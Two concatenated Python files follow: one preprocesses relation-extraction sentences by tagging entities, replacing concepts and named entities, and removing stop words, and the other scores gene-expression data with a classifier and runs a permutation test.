Performs pre-processing on a csv file independent of the dataset (once converters have been applied).
Refer to notebooks/Data-Preprocessing for more details. The methods are specifically used in the non
_original notebooks for all datasets.
'''
import os, pandas as pd, numpy as np
import nltk
import spacy
from spacy.tokens import Doc
# important global variables for identifying the location of entities
entity1 = 'E'
entity2 = 'EOTHER'
entity_either = 'EEITHER'
'''
The methods below are for the preprocessing type 1
'''
# separate the indexes of entity 1 and entity 2 by what is intersecting
# and what is not
def get_common_and_separate_entities(e1_indexes, e2_indexes):
    """Split entity-1 and entity-2 index collections into exclusive and shared parts.

    Returns ``(only_e1, only_e2, common)`` as lists, where *common* holds the
    indexes present in both inputs.
    """
    set_e1 = set(e1_indexes)
    set_e2 = set(e2_indexes)
    shared = set_e1 & set_e2
    return list(set_e1 - shared), list(set_e2 - shared), list(shared)
# given an entity replacement dictionary like {'0:0': 'entity1'}
# provide more information related to the location of the entity
def entity_replacement_dict_with_entity_location(entity_replacement_dict,
                                                 only_e1_indexes, only_e2_indexes, common_indexes):
    """Augment a replacement dict (e.g. ``{'0:0': 'entity1'}``) with entity-location markers.

    Every key gets ``{'replace_by', 'start', 'end'}``; ``start``/``end`` stay
    ``None`` (insert nothing around those words) unless the key's span belongs
    to entity 1 only, entity 2 only, or both, in which case the corresponding
    START/END marker strings are attached.
    """
    enriched = {
        key: {'replace_by': value, 'start': None, 'end': None}
        for key, value in entity_replacement_dict.items()
    }

    def tag_spans(index_spans, start_marker, end_marker):
        # Each span is a sequence of word indexes; the dict key is "first:last".
        for span in index_spans:
            key = str(span[0]) + ':' + str(span[-1])
            enriched[key]['start'] = start_marker
            enriched[key]['end'] = end_marker

    tag_spans(only_e1_indexes, entity1 + 'START', entity1 + 'END')
    tag_spans(only_e2_indexes, entity2 + 'START', entity2 + 'END')
    tag_spans(common_indexes, entity_either + 'START', entity_either + 'END')
    return enriched
###
### Helper functions
###
#given string 12:30, return 12, 30 as a tuple of ints
def parse_position(position):
    """Parse a '12:30'-style position string into a tuple of two ints."""
    parts = position.split(':')
    return int(parts[0]), int(parts[1])
def sort_position_keys(entity_replacement_dict):
    """Return the dict's 'start:end' keys ordered by their numeric start index."""
    return sorted(entity_replacement_dict, key=lambda pos: int(pos.split(':')[0]))
# remove any additional whitespace within a line
def remove_whitespace(line):
    """Collapse runs of whitespace in *line* into single spaces and trim
    the ends.

    str.split() already discards leading/trailing whitespace and " ".join
    already returns a str, so the redundant str(...) and .strip() wrappers
    of the original are dropped; behavior is unchanged.
    """
    return " ".join(line.split())
def list_to_string(sentence):
    """Join a list of word tokens into one space-separated string."""
    return " ".join(sentence)
# adapted from tag_sentence method in converter_ddi
# note that white spaces are added in the new sentence on purpose
def replace_with_concept(row):
    """Rebuild the row's sentence with every entity span replaced by its
    upper-cased concept, wrapped in upper-cased ENTITY*START/ENTITY*END tags.

    Expects *row* to carry ``tokenized_sentence`` plus ``metadata`` with
    'e1'/'e2' word indexes and an 'entity_replacement' span->concept map.
    Returns the rebuilt, whitespace-normalized sentence string.
    """
    sentence = row.tokenized_sentence.split()
    e1_indexes = row.metadata['e1']['word_index']
    e2_indexes = row.metadata['e2']['word_index'] # assuming that within the same entity indexes, no overlap
    new_sentence = ''
    # split spans into e1-only, e2-only, and shared (tagged ENTITYEITHER)
    only_e1_indexes, only_e2_indexes, common_indexes = \
        get_common_and_separate_entities(e1_indexes, e2_indexes)
    entity_replacement_dict = row.metadata['entity_replacement'] # assuming no overlaps in replacement
    new_entity_replacement_dict = entity_replacement_dict_with_entity_location(entity_replacement_dict,
                                                                               only_e1_indexes, only_e2_indexes,
                                                                               common_indexes)
    repl_dict = new_entity_replacement_dict # just using proxy because names are long
    sorted_positions = sort_position_keys(new_entity_replacement_dict)
    for i in range(len(sorted_positions)):
        curr_pos = sorted_positions[i]
        curr_start_pos, curr_end_pos = parse_position(curr_pos)
        # '' when no tag applies to this span (plain replacement)
        start_replace = '' if repl_dict[curr_pos]['start'] is None else repl_dict[curr_pos]['start'].upper()
        end_replace = '' if repl_dict[curr_pos]['end'] is None else repl_dict[curr_pos]['end'].upper()
        between_replace = repl_dict[curr_pos]['replace_by'].upper() # between the entity replacement
        if i == 0:
            # words before the first span, then the tagged replacement
            new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_replace + ' ' + \
                between_replace + ' ' + end_replace + ' '
        else:
            prev_pos = sorted_positions[i-1]
            _, prev_end_pos = parse_position(prev_pos)
            middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos]) # refers to middle between prev segment and the
            # current segment
            if middle == '':
                middle = ' '
            new_sentence += middle + ' ' + start_replace + ' ' + between_replace + ' ' + end_replace + ' '
        # after the last span, append any remaining words of the sentence
        if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
            new_sentence += ' ' + list_to_string(sentence[curr_end_pos+1:])
    new_sentence = remove_whitespace(new_sentence)
    return new_sentence
'''
Preprocessing Type 2: Removal of stop words, punctuations and the replacement of digits
'''
# gives a dictionary signifying the location of the different entities in the sentence
def get_entity_location_dict(only_e1_indexes, only_e2_indexes, common_indexes):
    """Map each entity span to the START/END tag strings that wrap it.

    Keys follow the module-wide 'start:end' convention; spans shared by
    both entities get the ENTITYEITHER tags.
    """
    entity_location_dict = {}

    def add_spans(location_dict, index_pairs, start_tag, end_tag):
        for span in index_pairs:
            key = str(span[0]) + ':' + str(span[-1])
            location_dict[key] = {'start': start_tag, 'end': end_tag}
        return location_dict

    entity_location_dict = add_spans(entity_location_dict, only_e1_indexes,
                                     entity1 + 'START', entity1 + 'END')
    entity_location_dict = add_spans(entity_location_dict, only_e2_indexes,
                                     entity2 + 'START', entity2 + 'END')
    entity_location_dict = add_spans(entity_location_dict, common_indexes,
                                     entity_either + 'START', entity_either + 'END')
    return entity_location_dict
# given the index information of the entities, return the sentence with
# tags ESTART EEND etc to signify the location of the entities
def get_new_sentence_with_entity_replacement(sentence, e1_indexes, e2_indexes):
    """Insert ENTITY*START/ENTITY*END tags around the e1/e2 spans of a
    tokenized *sentence* (list of words) and return the tagged string,
    whitespace-normalized. The entity words themselves are kept."""
    new_sentence = ''
    only_e1_indexes, only_e2_indexes, common_indexes = \
        get_common_and_separate_entities(e1_indexes, e2_indexes)
    entity_loc_dict = get_entity_location_dict(only_e1_indexes, only_e2_indexes, common_indexes)
    sorted_positions = sort_position_keys(entity_loc_dict)
    for i in range(len(sorted_positions)):
        curr_pos = sorted_positions[i]
        curr_start_pos, curr_end_pos = parse_position(curr_pos)
        start_replace = entity_loc_dict[curr_pos]['start']
        end_replace = entity_loc_dict[curr_pos]['end']
        if i == 0:
            # words before the first entity, then the tagged entity itself
            new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_replace + ' ' + \
                list_to_string(sentence[curr_start_pos : curr_end_pos + 1]) + ' ' + end_replace + ' '
        else:
            prev_pos = sorted_positions[i-1]
            _, prev_end_pos = parse_position(prev_pos)
            # words strictly between the previous span and this one
            middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos])
            if middle == '':
                middle = ' '
            new_sentence += middle + ' ' + start_replace + ' ' + \
                list_to_string(sentence[curr_start_pos: curr_end_pos+1]) + ' ' + end_replace + ' '
        # append the tail of the sentence after the last entity span
        if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
            new_sentence += ' ' + list_to_string(sentence[curr_end_pos+1:])
    new_sentence = remove_whitespace(new_sentence)
    # TODO write some code to do the replacement
    return new_sentence
# preprocessing 2: remove the stop words and punctuation from the data
# and replace all digits
# TODO: might be nice to give an option to specify whether to remove the stop words or not
# this is a low priority part though
def replace_digit_punctuation_stop_word(row, stop_word_removal=True):
    """Tag the row's entities, then drop stop words/punctuation and replace
    number-like tokens with the literal token NUMBER.

    Args:
        row: dataframe row with ``tokenized_sentence`` and ``metadata``
            ('e1'/'e2' word indexes).
        stop_word_removal (bool): when True remove stop words AND
            punctuation; when False remove punctuation only.

    Returns:
        str: the filtered, tagged sentence.
    """
    # spacy.load is very expensive; the original reloaded the model on every
    # call (i.e. once per DataFrame row under .apply). Cache it on the
    # function object so the cost is paid once per process.
    if getattr(replace_digit_punctuation_stop_word, '_nlp', None) is None:
        replace_digit_punctuation_stop_word._nlp = spacy.load('en_core_web_lg')
    nlp = replace_digit_punctuation_stop_word._nlp
    sentence = row.tokenized_sentence.split()
    e1_indexes = row.metadata['e1']['word_index']
    e2_indexes = row.metadata['e2']['word_index']
    sentence = get_new_sentence_with_entity_replacement(sentence, e1_indexes, e2_indexes)
    # detection of stop words, punctuations and digits
    index_to_keep_dict = {}  # index: {keep that token or not, replace_with}
    tokenizedSentence = sentence.lower().split()
    doc = Doc(nlp.vocab, words=tokenizedSentence)
    # NOTE(review): nlp.tagger(doc)/nlp.parser(doc) is the spaCy 1.x
    # pipeline API; confirm the pinned spaCy version before upgrading.
    nlp.tagger(doc)
    nlp.parser(doc)
    for token in doc:
        word_index = token.i
        stop_word = token.is_stop
        punct = token.is_punct
        num = token.like_num
        if (stop_word_removal and (stop_word or punct)) or (not stop_word_removal and punct):
            index_to_keep_dict[word_index] = {'keep': False, 'replace_with': None}
        elif num:
            index_to_keep_dict[word_index] = {'keep': True, 'replace_with': 'NUMBER'}
        else:
            index_to_keep_dict[word_index] = {'keep': True, 'replace_with': None}
    # generation of the new sentence based on the above findings
    sentence = sentence.split()
    new_sentence = []
    for i in range(len(sentence)):
        word = sentence[i]
        # entity tags are always preserved verbatim
        if word.endswith('END') or word.endswith('START'):
            new_sentence.append(word)
            continue
        if not index_to_keep_dict[i]['keep']:
            continue  # don't append when it is a stop word or punctuation
        if index_to_keep_dict[i]['replace_with'] is not None:
            new_sentence.append(index_to_keep_dict[i]['replace_with'])
            continue
        new_sentence.append(word)
    return list_to_string(new_sentence)
'''
Preprocessing Type 3 part 1: NER
'''
# a method to check for overlap between the ner_dict that is created
def check_for_overlap(ner_dict):
    """Return True when any two 'start:end' spans in *ner_dict* share at
    least one token position.

    Overlap is symmetric, so each unordered pair is checked exactly once;
    the original also re-checked every pair in reverse order for no gain.
    """
    def expand_key(string): # a string that looks like '2:2' to {2}
        start = int(string.split(':')[0])
        end = int(string.split(':')[1])
        return set(range(start, end + 1))
    expanded_keys = [expand_key(key) for key in ner_dict.keys()]
    for i1 in range(len(expanded_keys)):
        for i2 in range(i1 + 1, len(expanded_keys)):
            if expanded_keys[i1] & expanded_keys[i2]:
                return True # overlap is true
    return False
###
### Helper functions for the NER replacement
###
def overlap_index(index1, index2):
    """True when the inclusive integer spans index1 and index2 intersect.

    Bounds may be ints or numeric strings; both are coerced to int.
    """
    def expand(span):
        return set(range(int(span[0]), int(span[1]) + 1))
    return bool(expand(index1) & expand(index2))
# for indexes that look like (1,1) and (2,2) check if the left is fully included in the right
def fully_included(index1, index2):
    """True when span index1 lies entirely within span index2 (inclusive)."""
    return int(index2[0]) <= int(index1[0]) and int(index1[1]) <= int(index2[1])
def beginning_overlap(index1, index2): # this is tricky when (1,1) and (2,2) are there
    """True when index1 starts before index2 but does not extend past its end."""
    return int(index1[0]) < int(index2[0]) and int(index1[1]) <= int(index2[1])
def end_overlap(index1, index2): # this is tricky
    """True when index1 extends past index2's end but does not start before it."""
    return int(index1[0]) >= int(index2[0]) and int(index1[1]) > int(index2[1])
def beginning_and_end_overlap(index1, index2):
    """True when index1 strictly contains index2 on both sides."""
    return int(index1[0]) < int(index2[0]) and int(index1[1]) > int(index2[1])
#else there is no overlap
# taken from https://stackoverflow.com/questions/46548902/converting-elements-of-list-of-nested-lists-from-string-to-integer-in-python
def list_to_int(lists):
    """Recursively convert every element of a possibly-nested list to int.

    Bug fix: the recursive branch referenced the undefined name
    ``convert_to_int`` and raised NameError on any nested list; it now
    recurses into ``list_to_int`` itself.
    """
    return [int(el) if not isinstance(el, list) else list_to_int(el) for el in lists]
def correct_entity_indexes_with_ner(ner_dict, e_index):
    """Widen each entity span in *e_index* so it fully covers any NER span
    it partially overlaps.

    Args:
        ner_dict: {'start:end': label} NER spans.
        e_index: list of (start, end) entity spans; mutated in place.

    Returns:
        The same list: spans are extended to the NER span's start, end, or
        both, depending on the kind of partial overlap. (The unused
        ``new_e_index`` accumulator of the original was removed.)
    """
    for i in range(len(e_index)): # we are reading tuples here
        for key in ner_dict.keys():
            index2 = e_index[i]
            index1 = parse_position(key) # checking if ner is fully included etc
            if not overlap_index(index1, index2): # don't do below if there is no overlap
                continue
            if beginning_overlap(index1, index2):
                e_index[i] = (index1[0], e_index[i][1])
            elif end_overlap(index1, index2):
                e_index[i] = (e_index[i][0], index1[1])
            elif beginning_and_end_overlap(index1, index2):
                e_index[i] = (index1[0], index1[1]) # else you don't change or do anything
    return e_index
# given all of these dictionaries, return the ner replacement dictionary
def get_ner_replacement_dictionary(only_e1_index, only_e2_index, common_indexes, ner_dict):
    """Build the combined replacement dict for NER spans and entity tags.

    NER spans keep their 'start:end' keys with a 'replace_by' label. Entity
    tags get 'pos:pos:TAG' keys whose 'insert' value is the tag to place
    BEFORE that token; the END tag key points one past the entity's last
    token so the tag lands after the entity.
    """
    # we are going to do something different: only spans for NER will be counted, but
    # for the ENTITYSTART and ENTITYEND, we will keep the span as what token to insert before
    ner_repl_dict = {
        span: {'replace_by': label, 'insert': None}
        for span, label in ner_dict.items()
    }

    def add_entity_tags(spans, entity_name):
        start_tag = entity_name + 'START'
        end_tag = entity_name + 'END'
        for span in spans:
            start_key = str(span[0]) + ':' + str(span[0]) + ':' + start_tag
            ner_repl_dict[start_key] = {'replace_by': None, 'insert': start_tag}
            after_end = str(int(span[-1]) + 1)
            end_key = after_end + ':' + after_end + ':' + end_tag
            ner_repl_dict[end_key] = {'replace_by': None, 'insert': end_tag}

    add_entity_tags(only_e1_index, entity1)
    add_entity_tags(only_e2_index, entity2)
    add_entity_tags(common_indexes, entity_either)
    return ner_repl_dict
# this function is different from the sort_position_keys because
# we care about sorting not just by the beginning token, but also by the length that the span contains
def ner_sort_position_keys(ner_repl_dict): # this can potentially replace sort_position_keys
    # but only if the application of this function does not change the preprocessed CSVs generated
    """Sort span keys by (start token, span length, tag kind).

    At the same position and length, END-insertion keys come before
    START-insertion keys so an entity closes before an adjacent one opens;
    plain NER spans (two-field keys) sort last.
    """
    def tag_priority(key):
        fields = key.split(':')
        if len(fields) <= 2: # means that this is a named entity
            return 3
        tag = fields[2]
        if tag.endswith('END'): # ending spans should get priority
            return 1
        if tag.endswith('START'):
            return 2

    def sort_key(key):
        fields = key.split(':')
        start, end = int(fields[0]), int(fields[1])
        return (start, end - start + 1, tag_priority(key))

    return sorted(ner_repl_dict.keys(), key=sort_key)
# given a splitted sentence - make sure that the sentence is in list form
def get_ner_dict(sentence, nlp):
    """Run spaCy NER over a pre-tokenized *sentence* (list of words) and
    return a {'start:end': label} dict of spans (end index inclusive)."""
    #nlp = spacy.load(spacy_model_name)
    tokenizedSentence = sentence # in this case lowercasing is not helpful
    doc = Doc(nlp.vocab, words=tokenizedSentence)
    # NOTE(review): tagger/parser/entity as standalone callables is the
    # spaCy 1.x pipeline API; newer versions invoke components differently.
    nlp.tagger(doc)
    nlp.parser(doc)
    nlp.entity(doc) # run NER
    ner_dict = {} # first test for overlaps within ner
    for ent in doc.ents:
        # ent.end is exclusive in spaCy, hence the -1 for an inclusive key
        key = str(ent.start) + ':' + str(ent.end - 1)
        ner_dict[key] = ent.label_
    return ner_dict
def convert_indexes_to_int(e_idx):
    """Coerce every (start, end) span pair to a tuple of ints."""
    return [(int(pair[0]), int(pair[1])) for pair in e_idx]
def replace_ner(row, nlp, check_ner_overlap=False): # similar to concept_replace, with some caveats
    """Replace NER spans in the row's sentence with their labels and insert
    ENTITY*START/ENTITY*END tags around the e1/e2 spans.

    Args:
        row: dataframe row with ``tokenized_sentence`` and ``metadata``.
        nlp: loaded spaCy model (legacy 1.x pipeline API; see get_ner_dict).
        check_ner_overlap (bool): when True, print a diagnostic if detected
            NER spans overlap each other — the logic below assumes they
            don't.

    Returns:
        str: the rebuilt, whitespace-normalized sentence.
    """
    sentence = row.tokenized_sentence.split()
    e1_indexes = row.metadata['e1']['word_index']
    e2_indexes = row.metadata['e2']['word_index']
    e1_indexes = convert_indexes_to_int(e1_indexes)
    e2_indexes = convert_indexes_to_int(e2_indexes)
    only_e1_indexes, only_e2_indexes, common_indexes = \
        get_common_and_separate_entities(e1_indexes, e2_indexes)
    ner_dict = get_ner_dict(sentence, nlp)
    if check_ner_overlap and check_for_overlap(ner_dict):
        print("There is overlap", ner_dict) # only need to check this once
    #Below code works only if there isn't overlap within ner_dict, so make sure that there isn't overlap
    # overlaps between ner label and e1 and e2 indexes are a problem
    # And they can be of two types
    # Type 1: NER overlaps with e1 or e2 in the beginning or end
    # Here we want to keep the NER link the same but extend e1 or e2 index to the beginning or end of the
    # NER
    #Type 2: NER is inside of the entity completely: At this point it should be simply ok to mention at what
    # token to insert ENTITYstart and ENTITYend
    # Type 1 is a problem, but Type 2 is easy to handle while the new sentence is being created
    only_e1_indexes = correct_entity_indexes_with_ner(ner_dict, only_e1_indexes)
    only_e2_indexes = correct_entity_indexes_with_ner(ner_dict, only_e2_indexes)
    common_indexes = correct_entity_indexes_with_ner(ner_dict, common_indexes)
    # below needs to be done in case there was again a shift that might have caused both e1 and e2 to have
    # the same spans
    only_e1_indexes, only_e2_indexes, common_indexes2 = \
        get_common_and_separate_entities(only_e1_indexes, only_e2_indexes)
    common_indexes.extend(common_indexes2)
    ner_repl_dict = get_ner_replacement_dictionary(only_e1_indexes, only_e2_indexes, common_indexes,
                                                   ner_dict)
    sorted_positions = ner_sort_position_keys(ner_repl_dict)
    new_sentence = '' # this below part is buggy, shouldn't be too bad to fix
    for i in range(len(sorted_positions)):
        curr_pos = sorted_positions[i]
        curr_start_pos, curr_end_pos = parse_position(curr_pos)
        curr_dict = ner_repl_dict[curr_pos]
        # tag to insert before this position ('' for plain NER spans)
        start_insert = '' if curr_dict['insert'] is None else curr_dict['insert'].upper()
        # NER label replacing the span's words ('' for tag-insertion keys)
        between_replace = '' if curr_dict['replace_by'] is None else curr_dict['replace_by']
        if i == 0:
            new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_insert + ' ' + \
                between_replace + ' '
        else:
            prev_pos = sorted_positions[i-1]
            _, prev_end_pos = parse_position(prev_pos)
            # tag-insertion keys consume no tokens, so the middle segment
            # starts AT prev_end_pos rather than after it
            if ner_repl_dict[prev_pos]['insert'] is None: # means middle will be starting from prev_pos + 1
                middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos])
            else: # means middle needs to start from the prev_pos
                middle = list_to_string(sentence[prev_end_pos: curr_start_pos])
            if middle == '':
                middle = ' '
            new_sentence += middle + ' ' + start_insert + ' ' + between_replace + ' '
        if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
            position = curr_end_pos + 1 if curr_dict['insert'] is None else curr_end_pos
            new_sentence += ' ' + list_to_string(sentence[position:])
    new_sentence = remove_whitespace(new_sentence)
    return new_sentence
'''
Below methods do entity detection from the tagged sentences, i.e. a sentence that contains
ESTART, EEND etc, use that to detect the locations of the respective entities and remove the tags
from the sentence to return something clean
'''
# below is taken directly from the ddi converter and
# removes the first occurence of the start and end, and tells of their location
def get_entity_start_and_end(entity_start, entity_end, tokens):
    """Locate one tagged entity and strip the first occurrence of its
    start/end tag pair.

    Args:
        entity_start (str): opening tag token, e.g. 'ENTITY1START'.
        entity_end (str): closing tag token, e.g. 'ENTITY1END'.
        tokens (list[str]): tagged sentence tokens.

    Returns:
        ((e_start, e_end), new_tokens): inclusive word indexes of the
        entity measured in the fully untagged sentence, and the token list
        with the first occurrence of each tag removed.
    """
    e_start = tokens.index(entity_start)
    e_end = tokens.index(entity_end) - 2 # 2 tags will be eliminated
    between_tags = 0
    # other entities' tags inside this span will also disappear later, so
    # the end index must shift left once per such tag
    for index in range(e_start + 1, e_end + 2):
        # we want to check between the start and end for occurence of other tags
        if tokens[index].endswith('START') or tokens[index].endswith('END'):
            between_tags += 1
    e_end -= between_tags
    # only eliminate the first occurence of the entity_start and entity_end
    new_tokens = []
    entity_start_seen = 0
    entity_end_seen = 0
    for x in tokens:
        if x == entity_start:
            entity_start_seen += 1
        if x == entity_end:
            entity_end_seen += 1
        if x == entity_start and entity_start_seen == 1:
            continue
        if x == entity_end and entity_end_seen == 1:
            continue
        new_tokens.append(x)
    return (e_start, e_end), new_tokens
# based upon the method in converter for DDI, this will do removal of the entity tags and keep
# track of where they are located in the sentence
def get_entity_positions_and_replacement_sentence(tokens):
    """Strip all entity tags from *tokens*, collecting the e1/e2 word-index
    spans as each tag pair is removed.

    ENTITYEITHER spans are recorded for both e1 and e2. Note the loop
    iterates the ORIGINAL token list while tags are progressively removed
    from tokens_for_indexing.

    Returns:
        (e1_idx, e2_idx, tokens_for_indexing): span lists and the untagged
        token list.
    """
    e1_idx = []
    e2_idx = []
    tokens_for_indexing = tokens
    for token in tokens:
        if token.endswith('START'):
            ending_token = token[:-5] + 'END' # e.g. ENTITY1START -> ENTITY1END
            e_idx, tokens_for_indexing = get_entity_start_and_end(token, ending_token, tokens_for_indexing)
            if token == entity1 + 'START' or token == entity_either + 'START':
                e1_idx.append(e_idx)
            if token == entity2 + 'START' or token == entity_either + 'START':
                e2_idx.append(e_idx)
    return e1_idx, e2_idx, tokens_for_indexing
#TODO unify the preprocessing code with actually writing to a dataframe so that experiments can be started
# Read the original dataframe, generate the replacement sentence and then from that, you should just
# call the get_entity_positions_and_replacement_sentence
# might be good to just have one method to do this because it seems like the tasks are kinda similar
# just different methods to call for preprocessing 1 vs 2
'''
Returns the dataframe after doing the preprocessing
'''
# update the metadata and the sentence with the preprocessed version
def update_metadata_sentence(row):
    """Recompute e1/e2 word indexes from the tagged sentence, strip the
    tags, and write the clean sentence back onto the row.

    The row is mutated in place and returned (DataFrame.apply-friendly).
    """
    e1_idx, e2_idx, clean_tokens = \
        get_entity_positions_and_replacement_sentence(row.tagged_sentence.split())
    metadata = row.metadata
    metadata['e1']['word_index'] = e1_idx
    metadata['e2']['word_index'] = e2_idx
    metadata.pop('entity_replacement', None) # remove the entity replacement dictionary from metadata
    row.tokenized_sentence = list_to_string(clean_tokens)
    row.metadata = metadata
    return row
# give this preprocessing function a method to read the dataframe, and the location of the original
# dataframe to read so that it can do the preprocessing
# whether to do type 1 vs type 2 of the preprocessing
# 1: replace with all concepts in the sentence, 2: replace the stop words, punctuations and digits
# 3: replace only punctuations and digits
def preprocess(read_dataframe, df_directory, nlp, type_to_do=1):
    """Read a dataframe and apply one of the preprocessing strategies.

    Args:
        read_dataframe: callable that loads a DataFrame from a directory.
        df_directory: location passed to read_dataframe.
        nlp: loaded spaCy model (used only for type 4 / NER replacement).
        type_to_do (int): 1 = concept replacement, 2 = drop stop words,
            punctuation and digits, 3 = drop punctuation and digits only,
            4 = NER replacement.

    Returns:
        pd.DataFrame: preprocessed frame with updated tokenized_sentence
        and metadata; the intermediate tagged_sentence column is dropped.

    Raises:
        ValueError: if type_to_do is not one of 1, 2, 3 or 4. (Previously
        an unknown value fell through and failed later with a confusing
        missing-column error.)
    """
    df = read_dataframe(df_directory)
    if type_to_do == 1:
        df['tagged_sentence'] = df.apply(replace_with_concept, axis=1) # along the column axis
    elif type_to_do == 2:
        df['tagged_sentence'] = df.apply(replace_digit_punctuation_stop_word, args=(True,), axis=1)
    elif type_to_do == 3:
        df['tagged_sentence'] = df.apply(replace_digit_punctuation_stop_word, args=(False,), axis=1)
    elif type_to_do == 4:
        df['tagged_sentence'] = df.apply(replace_ner, args=(nlp, False), axis=1)
    else:
        raise ValueError("type_to_do must be 1, 2, 3 or 4, got %r" % (type_to_do,))
    df = df.apply(update_metadata_sentence, axis=1)
    df = df.drop(['tagged_sentence'], axis=1)
    return df
| 24,681 | 7,763 |
import datetime
import seaborn as sns
import pickle as pickle
from scipy.spatial.distance import cdist, pdist, squareform
import pandas as pd
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
#from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import random
import datetime
from sklearn.decomposition import PCA
import scipy
from sklearn.metrics import pairwise_distances
from scipy.sparse import issparse, coo_matrix
import sys
def prediction(mwanted_order, mclasses_names, mprotogruop,
               mdf_train_set, mtrain_index, mreorder_ix,
               mcolor_dict, net, learninggroup="train"):
    """Score a genes-x-samples matrix with a fitted classifier and return
    per-class probabilities as a percentage DataFrame.

    Args:
        mwanted_order: class names in the desired output column order.
        mclasses_names: classifier class names (indexable by mtrain_index).
        mprotogruop: only referenced by commented-out plotting code.
        mdf_train_set (pd.DataFrame): matrix to score (samples in columns).
        mtrain_index: row selector used for the class-membership check in
            "train" mode.
        mreorder_ix: column permutation; recomputed in "train" mode and
            reused as-is in "test" mode.
        mcolor_dict: pandas Series mapping class name -> RGB triple;
            regenerated when it does not cover mwanted_order.
        net: fitted estimator exposing predict_proba.
        learninggroup (str): "train" or "test"; selects normalization.

    Returns:
        "train": (mreordername, dfprobCL, mcolor_dict, refdataLR, mreorder_ix)
        "test":  (mreordername, dfprobCL, mcolor_dict, dataRef)
        Implicitly returns None for any other learninggroup value.
    """
    #mwanted_order = mwanted_order, mclasses_names = mclasses_names, mprotogruop = dfpfcclus.loc["Cluster"].values,
    #mdf_train_set = mdf_train_set, figsizeV = 18, mtrain_index = mtrain_index, net = net, mreorder_ix = mreorder_ix,
    #mcolor_dict = refcolor_dict, learninggroup = "test"
    if learninggroup=="train":
        mreorder_ix = [list(mclasses_names).index(i) for i in mwanted_order]
        mbool00 = np.in1d( mclasses_names[mtrain_index], mwanted_order )
        # Rebuild the palette when it does not cover every requested class.
        # NOTE(review): the rebuilt value is a plain dict, but .map below is
        # a pandas Series method — this fallback path looks like it would
        # raise AttributeError; confirm mcolor_dict is always a Series.
        if sum(mcolor_dict.index.isin(mwanted_order))!=len(mwanted_order):
            mcolor_dict={}
            for item in mwanted_order:
                mcolor_dict[item]=random.sample(range(0, 255), 3)
            mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
        #mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
        #rcParams['savefig.dpi'] = 500
        #mnewcolors = array(list(mcolor_dict[mprotogruop].values))
        # scale each row by 0.9 x its maximum before scoring
        normalizer = 0.9*mdf_train_set.values.max(1)[:,np.newaxis]
        refdataLR=net.predict_proba((mdf_train_set.values/ normalizer).T)
        todaytime=f"{datetime.datetime.now():%Y%m%d%I%M%p}"
        dataRef= refdataLR[:,mreorder_ix]
        mreordername=[]
        for i in mreorder_ix:
            mreordername.append(list(mclasses_names)[i])
        dfprobCL=pd.DataFrame(dataRef*100, index=mdf_train_set.columns,columns=mreordername)
        #dfnewcl=pd.DataFrame(array([xtest,ytest]).T, index=mdf_train_set.columns)
        return mreordername, dfprobCL, mcolor_dict, refdataLR, mreorder_ix
    elif learninggroup=="test":
        #mreorder_ix = [list(mwanted_order).index(i) for i in mwanted_order]
        if sum(mcolor_dict.index.isin(mwanted_order))!=len(mwanted_order):
            mcolor_dict={}
            for item in mwanted_order:
                mcolor_dict[item]=random.sample(range(0, 255), 3)
            mcolor_dict = mcolor_dict.map(lambda x: list(map(lambda y: y/255., x)))
        #mnewcolors = array(list(mcolor_dict[mprotogruop].values))
        # min-max normalize each row to [0, 1]; zero-range rows become 0
        normalizerTest=mdf_train_set.max(1)-mdf_train_set.min(1)
        normalizedValue=(mdf_train_set.sub(mdf_train_set.min(1),0).div(normalizerTest,0).fillna(0).values).T
        dataRef=net.predict_proba( normalizedValue)
        mreordername=[]
        for i in mreorder_ix:
            mreordername.append(list(mclasses_names)[i])
        dfprobCL=pd.DataFrame(dataRef*100, index=mdf_train_set.columns,columns=mreordername)
        #dfnewcl=pd.DataFrame(array([xtest,ytest]).T, index=mdf_train_set.columns)
        return mreordername, dfprobCL, mcolor_dict, dataRef
def permutationTest(mdf_train_set, net, dfprobRef, mreorder_ix, num):
    """Estimate a null distribution of class probabilities by permutation.

    The expression matrix is flattened, randomly permuted, reshaped,
    rescaled to [0, 1], and scored with *net*; this runs ``num + 1`` times
    and the scores are stacked. (The original duplicated the loop body once
    before the loop; collecting all rounds in one loop removes that
    duplication without changing the sequence of random draws.)

    Args:
        mdf_train_set (pd.DataFrame): features x samples matrix.
        net: fitted classifier exposing predict_proba.
        dfprobRef (pd.DataFrame): reference probability frame; only its
            columns (class names) label the output.
        mreorder_ix (list[int]): column order applied to predict_proba.
        num (int): number of additional permutation rounds (num + 1 total).

    Returns:
        (dftest0, ratiodf): permuted probabilities in percent, and the
        fraction of permuted scores above each threshold 0%..99%.
    """
    n_rows = len(mdf_train_set.index)
    n_cols = len(mdf_train_set.columns)
    scores = []
    for _ in range(num + 1):
        flat = np.random.permutation(mdf_train_set.values.reshape(n_cols * n_rows))
        xp = pd.DataFrame(flat.reshape((n_rows, n_cols))).astype(float).values
        xp -= xp.min()
        xp /= np.ptp(xp)  # np.ptp(): the ndarray.ptp method was removed in NumPy 2.0
        scores.append(net.predict_proba(xp.T)[:, mreorder_ix])
    test0 = np.concatenate(scores, axis=0)
    thresholdlist = []
    temp = []
    for threshold in np.arange(0.0, 1.0, 0.01):
        thresholdlist.append("Prob_%s%%" % int(threshold * 100))
        temp.append(np.sum(test0 > threshold, axis=0) / test0.shape[0])
    ratiodf = pd.DataFrame(temp)
    ratiodf.index = thresholdlist
    ratiodf.columns = dfprobRef.columns
    dftest0 = pd.DataFrame(test0 * 100, columns=dfprobRef.columns)
    return dftest0, ratiodf
